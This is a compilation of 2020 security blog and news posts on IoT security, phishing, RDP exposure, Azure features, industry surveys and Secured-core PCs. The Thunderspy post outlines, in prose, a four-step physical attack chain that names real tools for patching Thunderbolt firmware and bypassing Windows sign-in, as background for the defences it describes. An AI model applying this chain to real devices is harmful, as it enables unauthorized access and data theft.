Adding internet connectivity to a class of device means a single, remote attack can scale to hundreds of thousands or millions of devices. The ability to scale a single exploit to this degree is cause for reflection on the upheaval IoT brings to the marketplace. Once the decision is made to connect a device to the internet, that device has the potential to transform from a single-purpose device to a general-purpose computer capable of launching a DDoS attack against any target in the world. The Mirai botnet is also a demonstration that a manufacturer does not need to sell many devices to create the potential for a “weaponized” device.

IoT security is not only about “safety-critical” deployments. Any deployment of a connected device at scale requires the seven properties. In other words, the function, purpose, and cost of a device should not be the only considerations when deciding whether security is important.

The seven properties do not guarantee that a device will not be hacked. However, they greatly minimize certain classes of threats and make it possible to detect and respond when a hacker gains a toehold in a device ecosystem. If a device doesn’t have all seven, human practices must be implemented to compensate for the missing features. For example, without renewable security, a security incident will require disconnecting devices from the internet and then recalling those devices or dispatching people to manually patch every device that was attacked.

Implementation challenges

Some of the seven properties, such as a hardware-based root of trust and compartmentalization, require certain silicon features. Others, such as defense in-depth, require a certain software architecture as well as silicon features like the hardware-based root of trust. Finally, other properties, including renewable security, certificate-based authentication, and failure reporting, require not only silicon features and certain software architecture choices within the operating system, but also deep integration with cloud services. Piecing these critical pieces of infrastructure together is difficult and prone to errors. Ensuring that a device incorporates these properties could therefore increase its cost.

These challenges led us to believe the seven properties also created an opportunity for security-minded organizations to implement these properties as a platform, which would free device manufacturers to focus on product features, rather than security. Azure Sphere represents such a platform: the seven properties are designed and built into the product from the silicon up.

Best practices for implementing the seven properties

Based on our decades of experience researching and implementing secured products, we identified 19 best practices that were put into place as part of the Azure Sphere product. These best practices provide insight into why Azure Sphere sets such a high standard for security. Read the full paper, Nineteen cybersecurity best practices used to implement the seven properties of highly secured devices in Azure Sphere, for the in-depth discussion of each of these best practices and how they—along with the seven properties themselves—guided our design decisions.

We hope that the discussion of these best practices sheds some additional light on the large number of features the Azure Sphere team implemented to protect IoT devices. We also hope that this provides a new set of questions to consider in evaluating your own IoT solution. Azure Sphere will continue to innovate and build upon this foundation with more features that raise the bar in IoT security.

To read previous blogs on IoT security, visit our blog series:  https://www.microsoft.com/security/blog/iot-security/   Be sure to bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity

The post Cybersecurity best practices to implement highly secured devices appeared first on Microsoft Security.

CEOs and CISOs disagree on cyber strategies

There are growing disparities in how CEOs and CISOs view the most effective cybersecurity path forward, according to Forcepoint. The global survey of 200 CEOs and CISOs from across industries including healthcare, finance and retail, among others, uncovered prominent cybersecurity stressors and areas of disconnect for business and security leaders, including the lack of an ongoing cybersecurity strategy for less than half of all CEO respondents. The research also identified disparities between geographic regions on … More

The post CEOs and CISOs disagree on cyber strategies appeared first on Help Net Security.

With the threat landscape continuously changing, businesses must be ready for anything

Despite efforts by organizations to layer up their cyber defenses, the threat landscape is changing, attackers are innovating and automating their attacks, NTT reveals. The threat landscape is changing Referencing the COVID-19 pandemic, the report highlights the challenges that businesses face as cyber criminals look to gain from the global crisis and the importance of secure-by-design and cyber-resilience. The attack data indicates that 55% of all attacks in 2019 were a combination of web-application and … More

The post With the threat landscape continuously changing, businesses must be ready for anything appeared first on Help Net Security.

With increased DevOps adoption, roles in software development teams are changing

Roles across software development teams have changed as more teams adopt DevOps, according to GitLab. The survey of over 3,650 respondents from 21 countries worldwide found that rising rates of DevOps adoption and implementation of new tools has led to sweeping changes in job functions, tool choices and organization charts within developer, security and operations teams. “This year’s Global DevSecOps Survey shows that there are more successful DevOps practitioners than ever before and they report … More

The post With increased DevOps adoption, roles in software development teams are changing appeared first on Help Net Security.

Technologies in all layers of the cloud stack are at risk

As breaches and hacks continue, and new vulnerabilities are uncovered, secure coding is being recognized as an increasingly important security concept — and not just for back-room techies anymore, Accurics reveals. Cloud stack risk “Our report clearly describes how current security practices are grossly inadequate for protecting transient cloud infrastructures, and why more than 30 billion records have been exposed through cloud breaches in just the past two years,” said Sachin Aggarwal, CEO at Accurics. … More

The post Technologies in all layers of the cloud stack are at risk appeared first on Help Net Security.

Over half of security leaders still rely on spreadsheets

Senior security leaders within financial services companies are being challenged with a lack of trusted data to make effective security decisions and reduce their risk from cyber incidents, according to Panaseer. Results from a global external survey of over 400 security leaders that work in large financial services companies reveal concerns on security measurement and metrics that include data confidence, manual processes, resource wastage and request overload. Issues with processes, people and technologies The results … More

The post Over half of security leaders still rely on spreadsheets appeared first on Help Net Security.

Protect Yourself Against Phishing Scams With These Security Tips

Phishing is one of the oldest cyberthreats in the book, and yet still one of the most effective. As people across the globe find themselves taking to the internet more than ever before, criminals see this as an opportunity to release phishing attacks on unsuspecting users. In fact, Security Boulevard found a 600% rise in phishing campaigns in the last month. So, as users leverage the World Wide Web to stay connected with friends and loved ones, it’s imperative that they remain wary of scammers looking to exploit our need to virtually communicate. With that, let’s take a look at why phishing is so effective even in 2020 and explore what actions users can take to stay protected. 

What is Phishing?

Phishing attacks occur when scammers attempt to trick users out of money or personal information, usually by email, phone, or text. With so many avenues for criminals to hook victims, phishing is one of the most prevalent threats we see today. As part of their phishing schemes, scammers often use something called social engineering to manipulate users into trusting them for fraudulent purposes, often by pretending to be a legitimate person or business. Through these phishing attacks, criminals can spread malware and other malicious content.  

The Evolution of Phishing

As new technology and circumstances arise, scammers find new ways to evolve the age-old technique of phishing. What originated as email and instant messages attempting to steal users’ credentials has since taken on new forms like SMiShing or adapted its content to hook the victim with a shocking subject line. 

Why has this technique continued to plague users since its inception? Hackernoon argues that it’s because phishing doesn’t require in-depth networking knowledge or even basic programming skills. It simply relies on human error and the lack of online security awareness, manipulating human psychology just as much as technological tools.  

Phishing Capitalizes on Emotion

Let’s face it – we’re all human. Our inherent psychology makes us quick to act on emotion. However, this is much of the reason why phishing has forged on as a favorite among hackers. Unfortunately, criminals tend to capitalize on bad or shocking news to grasp the victim’s attention, leading them to click on malicious links or give up personal data all too eagerly. Take today’s environment, for example. As businesses are faced with budget cuts and organizational restructuring, many users might be uncertain about their job security – an opportunity that scammers are eager to exploit. In fact, some organizations have recently observed phishing emails with subject lines reading “HR Termination List.” Through these malicious attempts, fraudsters use fear tactics to tempt recipients into clicking on links in emails or downloading dangerous content.  

With millions of users suddenly out of work, a lot of people have found themselves desperately looking for new job opportunities or seeking financial help. However, users should not let their guard down while job hunting, as this could prevent them from noticing the tell-tale signs of phishing. According to The Motley Fool, some phishing emails and text messages claim to offer work-from-home job opportunities, information about health insurance or Medicare, or loans or other forms of financial reliefIn fact, the Federal Communications Commission (FCC) reported that many Americans have received texts from the “FCC Financial Care Center” offering $30,000 in relief for those who have recently been laid off or furloughed. While this might appear to be a saving grace, it’s a stealthy demise to trick users into giving up their credentials.  

Act Now to Stay Protected

So, whether you’re working from homeparticipating in distance learning to complete college courses, or video chatting with loved ones, there will always be fraudsters looking to exploit your online activity. However, there are proactive measures you can take to help ensure your security. First and foremost is using comprehensive security softwareIf you’ve never been targeted by a phishing scam, it might be difficult to envision the benefit of installing a security solution. You might even be convinced that if you haven’t been targeted yet, then you won’t be in the future. However, there’s no off-season when it comes to security. As fraudsters continue to evolve their techniques, employing the help of security software will act as an added safety net in the event that a phishing email appears in your inbox.  

Aside from using comprehensive security software, here are some other tips to help protect your online security.  

Go directly to the source

Be skeptical of emails or text messages claiming to be from organizations with peculiar asks or with information that seems too good to be true. Instead of clicking on a link within the email or text, it’s best to go straight to the organization’s website or contact customer service. 

Be cautious of emails asking you to act

If you receive an email or text asking you to take a certain action or download software, don’t click on anything within the message. Instead, go straight to the organization’s website. This will prevent you from downloading malicious content from phishing links. 

Hover over links to see and verify the URL

If someone sends you a message with a link, hover over the link without actually clicking on it. This will allow you to see a link preview. If the URL looks suspicious, don’t interact with it and delete the message altogether. 

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook. 

The post Protect Yourself Against Phishing Scams With These Security Tips appeared first on McAfee Blogs.

Microsoft Build brings new innovations and capabilities to keep developers and customers secure

As both organizations and developers adapt to the new reality of working and collaborating in a remote environment, it’s more important than ever to ensure that their experiences are secure and trusted. As part of this week’s Build virtual event, we’re introducing new Identity innovation to help foster a secure and trustworthy app ecosystem, as well as announcing a number of new capabilities in Azure to help secure customers.

New Identity capabilities to help foster a secure apps ecosystem

As organizations continue to adapt to the new requirements of remote work, we’ve seen an increase in the deployment and usage of cloud applications. These cloud applications often need access to user or company data, which has increased the need to provide strong security not just for users but applications themselves. Today we are announcing several capabilities for developers, admins, and end-users that help foster a secure and trustworthy app ecosystem:

  1. Publisher Verification allows developers to demonstrate to customers, with a verified checkmark, that the application they’re using comes from a trusted and authentic source. Applications marked as publisher verified means that the publisher has verified their identity through the verification process with the Microsoft Partner Network (MPN) and has associated their MPN account with their application registration.
  2. Application consent policies allow admins to configure policies that determine which applications users can consent to. Admins can allow users to consent to applications that have been Publisher Verified, helping developers unlock user-driven adoption of their apps.
  3. Microsoft authentication libraries (MSAL) for Angular is generally available and our web library identity.web for ASP.NET Core is in public preview. MSAL make it easy to implement the right authentication patterns, security features, and integration points that support any Microsoft identity—from Azure Active Directory (Azure AD) accounts to Microsoft accounts.

In addition, we’re making it easier for organizations and developers to secure, manage and build apps that connect with different types of users outside an organization with Azure AD External Identities now in preview. With Azure AD External Identities, developers can build flexible, user-centric experiences that enable self-service sign-up and sign-in and allow continuous customization without duplicating coding effort.

You can learn even more about our Identity-based solutions and additional announcements by heading over to the Azure Active Directory Tech Community blog and reading Alex Simons’ post.

Azure Security Center innovations

Azure Security Center is a unified infrastructure security management system for both Azure and hybrid cloud resources on-premises or in other clouds. We’re pleased to announce two new innovations for Azure Security Center, both of which will help secure our customers:

First, we’re announcing that the Azure Secure Score API is now available to customers, bringing even more innovation to Secure Score, which is a central component of security posture management in Azure Security Center. The recent enhancements to Secure Score (in preview) gives customers an easier to understand and more effective way to assess risk in their environment and prioritize which action to take first in order to reduce it.  It also simplifies the long list of findings by grouping the recommendations into a set of Security Controls, each representing an attack surface and scored accordingly.

Second, we’re announcing that suppression rules for Azure Security Center alerts are now publicly available. Customers can use suppression rules to reduce alerts fatigue and focus on the most relevant threats by hiding alerts that are known to be innocuous or related to normal activities in their organization. Suppressed alerts will be hidden in Azure Security Center and Azure Sentinel but will still be available with ‘dismissed’ state. You can learn more about suppression rules by visiting Suppressing alerts from Azure Security Center’s threat protection.

Azure Disk Encryption and encryption & key management updates

We continue to invest in encryption options for our customers. Here are our most recent updates:

  1. Fifty more Azure services now support customer-managed keys for encryption at rest. This helps customers control their encryption keys to meet their compliance or regulatory requirements. The full list of services is here. We have now made this capability part of the Azure Security Benchmark, so that our customers can govern use of all your Azure services in a consistent manner.
  2. Azure Disk Encryption helps protect data on disks that are used with VM and VM Scale sets, and we have now added the ability to use Azure Disk Encryption to secure Red Hat Enterprise Linux BYOS Gold Images. The subscription must be registered before Azure Disk Encryption can be enabled.

Azure Key Vault innovation

Azure Key Vault is a unified service for secret management, certificate management, and encryption key management, backed by FIPS-validated hardware security modules (HSMs). Here are some of the new capabilities we are bringing for our customers:

  1. Enhanced security with Private Link—This is an optional control that enables customers to access their Azure Key Vault over a private endpoint in their virtual network. Traffic between their virtual network and Azure Key Vault flows over the Microsoft backbone network, thus providing additional assurance.
  2. More choices for BYOK—Some of our customers generate encryption keys outside Azure and import them into Azure Key Vault, in order to meet their regulatory needs or to centralize where their keys are generated. Now, in addition to nCipher nShield HSMs, they can also use SafeNet Luna HSMs or Fortanix SDKMS to generate their keys. These additions are in preview.
  3. Make it easier to rotate secrets—Earlier we released a public preview of notifications for keys, secrets, and certificates. This allows customers to receive events at each point of the lifecycle of these objects and define custom actions. A common action is rotating secrets on a schedule so that they can limit the impact of credential exposure. You can see the new tutorial here.

Platform security innovation

Platform security for customers’ data recently took a big step forward with the General Availability of Azure Confidential Computing. Using the latest Intel SGX CPU hardware backed by attestation, Azure provides a new class of VMs that protects the confidentiality and integrity of customer data while in memory (or “in-use”), ensuring that cloud administrators and datacenter operators with physical access to the servers cannot access the customer’s data.

Customer Lockbox for Microsoft Azure provides an interface for customers to review and approve or reject customer data access requests. It is used in cases where a Microsoft engineer needs to access customer data during a support request. In addition to expanded coverage of services in Customer Lockbox for Microsoft Azure, this feature is now available in preview for our customers in Azure Government cloud.

You can learn more about our Azure security offerings by heading to the Azure Security Center Tech Community.

The post Microsoft Build brings new innovations and capabilities to keep developers and customers secure appeared first on Microsoft Security.

Passwords are and have always been an Achilles Heel in CyberSecurity

LogMeOnce, a password identity management suite provider, has published a detailed interview with myself titled 'Passwords are and have always been an Achilles Heel in CyberSecurity'. In the Q&A I talk about Passwords Security (obviously), Threat Actors, IoT Security, Multi-Factor Authentication (MFA), Anti-Virus, Biometrics, AI, Privacy, and a bit on how I got into a career in Cybersecurity.

Quotes
“I’m afraid people will remain the weakest link in security, and the vast majority of cybercriminals go after this lowest hanging fruit. It’s the least effort for the most reward.”

"There is no silver bullet with password security, but MFA comes close, it significantly reduces the risk of account compromise"

"The built-in biometric authentication capabilities of smartphones are a significant advancement for security"

"Cybercriminals go after this lowest hanging fruit, the least effort for the most reward."

"As technology becomes more secure and more difficult to defeat, it stands to reason criminals will increasingly target people more."

"The impact of the WannaCry ransomware outbreak on NHS IT systems is a recent example of such cyberattack which threatens lives."

"Machine Learning can provide real benefits, especially in large Security Operations Centres (SOC), by helping analysts breakdown the steady stream of data into actionable intelligence, reducing workload and false-positive errors"

"When I look at new technology today, I still seek to thoroughly understand how it works, naturally thinking about the weaknesses which could be exploited, and the negative impact of such exploits on the people and businesses using the technology. I developed a kind of a ‘hacker’s eye for business’"

CISOs are critical to thriving companies: Here’s how to support their efforts

Even before COVID-19 initiated an onslaught of additional cybersecurity risks, many chief information security officers (CISOs) were struggling. According to a 2019 survey of cybersecurity professionals, these critical data defenders were burned out. At the time, 64% were considering quitting their jobs, and nearly as many, 63%, were looking to leave the industry altogether. Of course, COVID-19 and the ensuing remote work requirements have made the problem worse. It’s clear that companies could be facing … More

The post CISOs are critical to thriving companies: Here’s how to support their efforts appeared first on Help Net Security.

Review: Kill Chain: The Cyber War on America’s Elections

Kill Chain is an HBO documentary made and produced by Simon Arizzone, Russell Michaels and Sarah Teale. Kill Chain: Inside the documentary Arizzone and Michaels already worked on a documentary in 2006 called Hacking Democracy, which was about uncovering voting machines vulnerabilities and about how votes were manipulated, leading to George W. Bush winning the elections (2004). And here we are again in 2020 talking about the same problem and uncovering the same old security … More

The post Review: Kill Chain: The Cyber War on America’s Elections appeared first on Help Net Security.

How a good user experience brings the pieces of the enterprise IT jigsaw together

Have you ever done a jigsaw puzzle with pieces missing? Or tried to do a complicated one with only part of the picture showing on the box lid? If so, you will know how it feels to be the folks working to create secure, robust, and seamless enterprise IT systems. Enterprise IT has morphed into something that can feel complex and messy at best and out of control at worst. Each deployment can be convoluted, … More

The post How a good user experience brings the pieces of the enterprise IT jigsaw together appeared first on Help Net Security.

Mental Health Awareness Week: Coping with cybersecurity pressures amidst a global pandemic

As most of the UK’s cybersecurity workforce now sits at home isolated while carrying out an already pressurised job, there is every possibility that this could be affecting their mental health. In light of Mental Health Awareness Week, and as the discussion around employee wellbeing becomes louder and louder amidst the COVID-19 pandemic, we spoke with five cybersecurity experts to get their thoughts on how organisations can minimise the negative mental and physical impacts on … More

The post Mental Health Awareness Week: Coping with cybersecurity pressures amidst a global pandemic appeared first on Help Net Security.

How data intelligent organizations mitigate risk

Organizations that put data at the center of their vision and strategy realize a differentiated competitive advantage by mitigating cost and risk, growing revenue and improving the customer experience, a Collibra survey of more than 900 global business analysts reveals. Orgs rarely use data to guide business decisions Despite a majority of companies saying they valued using data to drive decisions, many organizations are not consistently executing. While 84% of respondents said that it is … More

The post How data intelligent organizations mitigate risk appeared first on Help Net Security.

How to Stay Protected From Malware While Online at Home

Our everyday lives are not what they used to be three months ago. Many users have made the transition from working in an office to working from home and students have adopted distance learningBut while the world focuses on one virus sweeping the globe, criminals see an opportunity to spread other types of viruses across our networks and devices.  

As users adapt to their increased time spent at home and onlinehackers are taking advantage by spreading malware and other scams. Let’s break down some of the major malware scams affecting users today, as well as how they can stay secure.   

Remote Workers Targeted Through RDP Ports

With recent events accelerating the WFH trend, many companies have restricted employee travel and allocated more resources to enable virtual work. According to McAfee security researcher Thomas Roccia, a key component of enabling remote work and allowing employees to access internal corporate resources remotely is Remote Desktop Protocol (RDP). RDP is a Microsoft protocol that allows communication with a remote system. At a time where connectivity is more important now than ever before, it’s critical for users to be able to easily access the same tools and apps that they would in their office from their newfound remote work environmentsHowever, it’s likely that many organizations brought systems online quickly with minimal security checks in place, giving attackers the opportunity to infiltrate them with ease. Because RDP ports are often exposed to the internet,  an attacker could gain access to an entire network and consequentially, access a remote employee’s systemWhat’s more, these networks can be used as entry points for spreading malware or other malicious activities.  

Since March 2020, the McAfee Advanced Threat Research team has seen a significant increase in the number of exposed RDP ports. But what does that mean for users working remotelyBecause exposed RDP ports grant criminals access to remote systems, they are able to implement a number of malicious threats that could not only impact users working from home but also the organizations they work for. These threats include spreading spam and malware, as well as using the compromised RDP port to disguise malicious activity and compile their tools on the machine.  

Phishing Emails Spreading Malware and Ransomware

Recently, hackers have also leveraged phishing emails regarding today’s current events to lure people into engaging with malicious content and enabling threats to gain access to their systemsOnce established, that foothold can allow hackers to leverage malware to steal usernames and passwords, data, monitor user activity, capture user keystrokes, track network traffic and browser activity, and infiltrate networks and cloud services beyond the home. Criminals can also impersonate their victim to send emails from the infected devices to propagate themselves on numerous other systems. What’s more, hackers could spread ransomware that encrypts system files and refuse to decrypt them until the victim sends a ransom payment.  

Stay Secure in the New Digital Landscape

Hackers will always seek to capitalize on current events in order to spread cyber misfortune. The recent surge of remote employees and users taking to the internet in order to pass the time is no exception.  However, there are several steps users can take to facilitate a safe online environment for themselves and their families. Here’s what you can do to stay protected from malware regarding the current health emergency and similar threats: 

Secure your RDP protocol

Because RDP remains one of the most used vectors to breach into organizations and personal networksit’s important to follow best security practices. This includes using strong passwords and multi-factor authentication, patching vulnerabilities immediately, and not allowing RDP connections over the open internet. Discover more best practices on how to secure your RDP protocol in our blog on RDP security 

Beware of messages from unknown users

If you receive a text, email, social media message, or phone call from an unknown user regarding the current health emergency, it’s best to proceed with caution and avoid interacting with the message altogether.   

Go directly to the source

If you receive information from an unknown user, go directly to the source instead of clicking on links within messages or attachments. Using a tool like McAfee WebAdvisor can help users stay safe from malware and other threats while searching the web.   

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook. 

The post How to Stay Protected From Malware While Online at Home appeared first on McAfee Blogs.

5 Ways Cyber Security Is Changing In 2020

Introduction

Security whilst online has been paramount for many years and with the ever-advancing technology available to us, cybersecurity is constantly evolving. Whilst the internet is an invaluable resource for our modern lives, it can also be a dangerous place but with these new advances in security, 2020 is set to show changes in cybersecurity in both good and bad ways, in this article we are going to explain this to you.

5 Ways Cyber Security Is Changing In 2020

1. Artificial Intelligence

Artificial intelligence or AI as it is more fondly know has been around for a while now, however, in 2020 it is estimated that this ever-changing form of technology is going to be used more frequently by those looking for targets online and by those trying to stop the ‘bad guys.’ This tech is able to detect patterns in online behavior and respond accordingly, leaving human intervention almost completely unnecessary.

2. 5G

There are a LOT of theories surrounding the rolling out of 5G, but until it is being widely used, no one can really predict its impact. However, one thing that is for sure is that it is something we will be exposed to this year and according to reports, it isn’t fully developed enough to withstand the high amount of threat online. Therefore, those at the top of tech are going to need to man all stations to keep on top of cybersecurity when using 5G.

3. Cyber Security Technology Platforms

This might seem like a complex term, and it is. However, in short, these platforms are essentially made up of five major components which will provide top-level security, and they look set to become a cybersecurity preference over the single-component tools of previous years.

4. Hackers Are Going To The Source

In years gone by hackers and cybercriminals would target individuals or companies but with the advances, we are seeing in technology, they are now able to target service providers. This means access to thousands of their customers and information. It sounds scary and it is. But on the flip side, these service providers also have access to just as innovative tech to fight the battle.

5. Risk Management

Attempting to handle individual cyber crimes is a fight that nobody is ever going to win. That being said, in 2020 it looks set to be more about managing the risks in order to put a stop to these types of crimes before the perpetrators have even had a chance to commit cybercrime. Businesses operating online now have access to an incredible amount of tools that can help them to prevent attacks, stopping them at the source.

Conclusion

It is astonishing how fast technology is moving forward and the speed at which this is happening is bound to translate into ever-changing online trends, and cybersecurity is no exception to this. If you are concerned about cybersecurity there are many tools and programs that you can use, funding this couldn’t be easier with the use of websites such as NowLoan which gives you the chance to find the best loans to fund your cybersecurity efforts.

The post 5 Ways Cyber Security Is Changing In 2020 appeared first on .

Redefining business for a digital world with smart security decisions

Kurt John is Chief Cybersecurity Officer of Siemens USA, where he is responsible for the information security strategy, governance and implementation for the company’s largest market with ~$23B in annual revenues. In this interview with Help Net Security, he explores a variety of smart security decisions. Kurt discusses the challenges modern CISO have to deal with, the importance of IT security certification, he provides his opinion on what an ideal cybersecurity candidate looks like, and … More

The post Redefining business for a digital world with smart security decisions appeared first on Help Net Security.

Security and the rapidly growing importance of mobile apps

Organizations are under more pressure than ever before to rapidly produce both new apps and updates to existing apps, not only because it’s essentially the only way they can interact with their customers, but also because there will be a flood of new users who previously relied on physical locations to conduct their business. Continuous mobile development is now more critical than ever, and organizations must provide error-free, engaging user experiences. In the rush to … More

The post Security and the rapidly growing importance of mobile apps appeared first on Help Net Security.

Shifting responsibility is causing uncertainty and more security breaches

Data security is creating fear and trust issues for IT professionals, according to a new Oracle and KPMG report. The study of 750 cybersecurity and IT professionals across the globe found that a patchwork approach to data security, misconfigured services and confusion around new cloud security models has created a crisis of confidence that will only be fixed by organizations making security part of the culture of their business. Data security is keeping IT professionals … More

The post Shifting responsibility is causing uncertainty and more security breaches appeared first on Help Net Security.

Identity-related breaches on the rise, prevention still a work in progress

The number of workforce identities in the enterprise is growing dramatically, largely driven by DevOps, automation, and an increase in enterprise connected devices, which will only continue to accelerate identity growth, an IDSA survey of 502 IT security and identity decision makers reveals. At the same time, compromised identities remain one of the leading causes of a data breach. According to the study, the vast majority of IT security and identity professionals have experienced an … More

The post Identity-related breaches on the rise, prevention still a work in progress appeared first on Help Net Security.

Less than a quarter of Americans use a password manager

A large percentage of Americans currently do not take the necessary steps to protect their passwords and logins online, FICO reveals. As consumers reliance on online services grows in response to COVID-19, the study examined the steps Americans are taking to protect their financial information online, as well as attitudes towards increased digital services and alternative security options such as behavioral biometrics. Do you use a password manager? The study found that a large percentage … More

The post Less than a quarter of Americans use a password manager appeared first on Help Net Security.

Modern crypto standards pave the way to stronger security

Cyberthreats are a ubiquitous concern for organizations operating in the digital world. No company is immune — even large and high-profile organizations like Adobe, Yahoo, LinkedIn, Equifax and others have reported massive data breaches in recent years. Cyberattacks are only growing in frequency, affecting billions of people and threatening businesses. What’s being done to bolster information security as cyberattacks continue to happen? The National Institute of Standards and Technology (NIST), a non-regulatory agency of the … More

The post Modern crypto standards pave the way to stronger security appeared first on Help Net Security.

New software enables existing sensors to detect ransomware

Engineers from SMU’s Darwin Deason Institute for Cybersecurity have developed software to detect ransomware attacks before attackers can inflict catastrophic damage. Ransomware is crippling cities and businesses all over the world, and the number of ransomware attacks have increased since the start of the coronavirus pandemic. Attackers are also threatening to publicly release sensitive data if ransom isn’t paid. The FBI estimates that ransomware victims have paid hackers more than $140 million in the last … More

The post New software enables existing sensors to detect ransomware appeared first on Help Net Security.

COVID-19 online fraud trends: Industries, schemes and targets

The telecommunications, retail and financial services industries have been increasingly impacted by COVID-19 online fraud, according to TransUnion. From a consumer perspective, Millennials have been most targeted by fraudsters using COVID-19 scams. Overall, the percent of suspected fraudulent digital transactions rose 5% from March 11 to April 28 when compared to Jan. 1 to March 10, 2020. More than 100 million risky transactions from March 11 to April 28 have been identified. “Given the billions … More

The post COVID-19 online fraud trends: Industries, schemes and targets appeared first on Help Net Security.

Businesses vulnerable to emerging risks have a gap in their insurance coverage

The majority of business decision makers are insured against traditional cyber risks, such as breaches of personal information, but most were vulnerable to emerging risks, such as malware and ransomware, revealing a potential insurance coverage gap, according to the Hanover Insurance Group. The report surveyed business decision makers about cyber vulnerabilities and risk mitigation efforts. Insurance purchasing decisions influenced by media coverage Most businesses surveyed indicated they had purchased cyber insurance, and more than 70% … More

The post Businesses vulnerable to emerging risks have a gap in their insurance coverage appeared first on Help Net Security.

Educational organizations use cloud apps to share sensitive data outside of IT control

Many educational organizations are at risk of data security incidents during the current period of working from home and virtual learning, a Netwrix report reveals. Weak data security controls According to the survey, even before the COVID-19 pandemic, the majority of educational organizations had weak data security controls. In particular, 54% of IT professionals in the educational sector confessed that employees put data at risk by sharing it via cloud apps outside of IT knowledge. … More

The post Educational organizations use cloud apps to share sensitive data outside of IT control appeared first on Help Net Security.

Secured-core PCs help customers stay ahead of advanced data theft

Researchers at the Eindhoven University of Technology recently revealed information around “Thunderspy,” an attack that relies on leveraging direct memory access (DMA) functionality to compromise devices. An attacker with physical access to a system can use Thunderspy to read and copy data even from systems that have encryption with password protection enabled.

Secured-core PCs provide customers with Windows 10 systems that come configured from OEMs with a set of hardware, firmware, and OS features enabled by default, mitigating Thunderspy and any similar attacks that rely on malicious DMA.

How Thunderspy works

Like any other modern attack, Thunderspy relies on not one but multiple building blocks being chained together. Below is a summary of how Thunderspy can be used to access a system where the attacker does not have the password needed to sign in. A video from the Thunderspy research team showing the attack is available here.

Step 1: A serial peripheral interface (SPI) flash programmer called Bus Pirate is plugged into the SPI flash of the device being attacked. This gives access to the Thunderbolt controller firmware and allows an attacker to copy it over to the attacker’s device

Step 2: The Thunderbolt Controller Firmware Patcher (tcfp), which is developed as part of Thunderspy, is used to disable the security mode enforced in the Thunderbolt firmware copied over using the Bus Pirate device in Step 1

Step 3: The modified insecure Thunderbolt firmware is written back to the SPI flash of the device being attacked

Step 4: A Thunderbolt-based attack device is connected to the device being attacked, leveraging the PCILeech tool to load a kernel module that bypasses the Windows sign-in screen

Diagram showing how the Thunderspy attack works

The result is that an attacker can access a device without knowing the sign-in password for the device. This means that even if a device was powered off or locked by the user, someone that could get physical access to the device in the time it takes to run the Thunderspy process could sign in and exfiltrate data from the system or install malicious software.

Secured-core PC protections

In order to counteract these targeted, modern attacks, Secured-core PCs use a defense-in-depth strategy that leverage features like Windows Defender System Guard and virtualization-based security (VBS) to mitigate risk across multiple areas, delivering comprehensive protection against attacks like Thunderspy.

Mitigating Steps 1 to 4 of the Thunderspy attack with Kernel DMA protection

Secured-core PCs ship with hardware and firmware that support Kernel DMA protection, which is enabled by default in the Windows OS. Kernel DMA protection relies on the Input/Output Memory Management Unit (IOMMU) to block external peripherals from starting and performing DMA unless an authorized user is signed in and the screen is unlocked. Watch this video from the 2019 Microsoft Ignite to see how Windows mitigates DMA attacks.

This means that even if an attacker was able to copy a malicious Thunderbolt firmware to a device, the Kernel DMA protection on a Secured-core PC would prevent any accesses over the Thunderbolt port unless the attacker gains the user’s password in addition to being in physical possession of the device, significantly raising the degree of difficulty for the attacker.

Hardening protection for Step 4 with Hypervisor-protected code integrity (HVCI)

Secured-core PCs ship with hypervisor protected code integrity (HVCI) enabled by default. HVCI utilizes the hypervisor to enable VBS and isolate the code integrity subsystem that verifies that all kernel code in Windows is signed from the normal kernel. In addition to isolating the checks, HVCI also ensures that kernel code cannot be both writable and executable, ensuring that unverified code does not execute.

HVCI helps to ensure that malicious kernel modules like the one used in Step 4 of the Thunderspy attack cannot execute easily as the kernel module would need to be validly signed, not revoked, and not rely on overwriting executable kernel code.

Modern hardware to combat modern threats

A growing portfolio of Secured-core PC devices from the Windows OEM ecosystem are available for customers. They provide a consistent guarantee against modern threats like Thunderspy with the variety of choices that customers expect to choose from when acquiring Windows hardware. You can learn more here: https://www.microsoft.com/en-us/windowsforbusiness/windows10-secured-core-computers

 

Nazmus Sakib

Enterprise and OS Security 

The post Secured-core PCs help customers stay ahead of advanced data theft appeared first on Microsoft Security.

Empowering your remote workforce with end-user security awareness

COVID-19 has rapidly transformed how we all work. Organizations need quick and effective user security and awareness training to address the swiftly changing needs of the new normal for many of us. To help our customers deploy user training quickly, easily and effectively, we are announcing the availability of the Microsoft Cybersecurity Awareness Kit, delivered in partnership with Terranova Security. For those of you ready to deploy training right now, access your kit here. For more details, read on.

Work at home may happen on unmanaged and shared devices, over insecure networks, and in unauthorized or non-compliant apps. The new environment has put cybersecurity decision-making in the hands of remote employees. In addition to the rapid dissolution of corporate perimeters, the threat environment is evolving rapidly as malicious actors take advantage of the current situation to mount coronavirus-themed attacks. As security professionals, we can empower our colleagues to protect themselves and their companies. But choosing topics, producing engaging content, and managing delivery can be challenging, sucking up time and resources. Our customers need immediate deployable and context-specific security training.

CYBERSECURITY AWARENESS KIT

At RSA 2020 this year, we announced our partnership with Terranova Security, to deliver integrated phish simulation and user training in Office 365 Advanced Threat Protection later this year. Our partnership combines Microsoft’s leading-edge technology, expansive platform capabilities, and unparalleled threat insights with Terranova Security’s market-leading expertise, human-centric design and pedagogical rigor. Our intelligent solution will turbo-charge the effectiveness of phish simulation and training while simplifying administration and reporting. The solution will create and recommend context-specific and hyper-targeted simulations, enabling you to customize your simulations to mimic real threats seen in different business contexts and train users based on their risk level. It will automate simulation management from end to end, providing robust analytics to inform the next cycle of simulations and enable rich reporting.

Our Cybersecurity Awareness Kit now makes available a subset of this user-training material relevant to COVID-19 scenarios to aid security professionals tasked with training their newly remote workforces. The kit includes videos, interactive courses, posters, and infographics like the one below. You can use these materials to train your remote employees quickly and easily.

Beware of COVID-19 Cyber Scams

For Security Professionals, we have created a simple way to host and deliver the training material within your own environment or direct your users to the Microsoft 365 security portal, where the training are hosted as seen below. All authenticated Microsoft 365 users will be able to access the training on the portal. Admins will see the option to download the kit as well. Follow the simple steps, detailed in the README, to deploy the awareness kits to your remote workforce.

